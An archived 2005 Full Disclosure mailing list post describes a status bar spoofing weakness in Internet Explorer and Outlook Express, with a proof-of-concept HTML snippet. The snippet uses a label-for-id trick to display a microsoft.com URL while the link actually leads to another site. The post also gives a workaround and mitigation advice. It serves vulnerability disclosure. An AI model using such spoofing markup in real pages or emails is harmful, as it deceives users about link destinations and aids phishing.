Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

IE/OE Restricted Zone Status Bar Spoofing
From: "winter bitlance" <bitlance_3 () hotmail com>
Date: Thu, 17 Feb 2005 05:22:08 +0000

Hi LIST.

It is normally possible for script code to manipulate information displayed in the status bar in the Internet Zone. By default, Outlook Express 6 open HTML e-mail messages in the Restricted sites zone instead of the Internet Zone. Outlook Express users may especially trust information displayed in the status bar since HTML documents are viewed in context of the "Restricted" zone, which has scripting support disabled.

However, errors in Internet Explorer allows manipulation of the status bar without using any script code. This can be exploited by embedding a specially crafted form in a link.

http-equiv has discovered a weakness in Internet Explorer, which potentially can be exploited by malicious people to trick users into visiting a malicious website which facilitates a "phishing" attack. ( CAN-2004-1104 )

Now another weakness which use a "label for id trick" has been discovered. This weakness is a variant of CAN-2004-1104.

Example:
- -----8<----- -----8<----- -----8<----- -----8<-----

[!-- saved from url=(0007)http:// -->
[body style="color: WindowText; background-color: Window;">
[div>IE/OE Restricted Zone Status Bar Spoofing[/div>
[div>Tested on Windows XP with SP2 installed.[/div>
[p>[a id="SPOOF" href="http://www.example.com/?maliciouscontents";>[/a>[/p>
[div> [a href="http://www.microsoft.com/windows/default.mspx";>
   [table>
     [caption>
       [a href="http://www.microsoft.com/windows/default.mspx ">
         [label for="SPOOF">
           [u style="cursor: pointer; color: blue">
             http://www.microsoft.com/windows/default.mspx
[/u> [/label>
       [/a>
     [/caption>
   [/table>
 [/a>
[/div>

- -----8<----- -----8<----- -----8<----- -----8<-----

workaround:( on Windows XP Service Pack 2 )

You can change the zone elevation setting under for each security zone by configuring the following option from Allow to Disabled or Prompt in the Custom Level Security dialog. "Web sites in less privileged Web content zones can navigate into this zone"

http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx



Solution:
Never follow links from untrusted sources.

Read e-mail messages in plain text format if you are using Outlook Express 6 SP1 or a later version , to help protect yourself from the HTML e-mail attack vector.

REGARDS.

--

bitlance winter

_________________________________________________________________
無料容量250MBでパワーアップ 「MSN Hotmail」 http://www.hotmail.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
  • IE/OE Restricted Zone Status Bar Spoofing winter bitlance (Feb 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]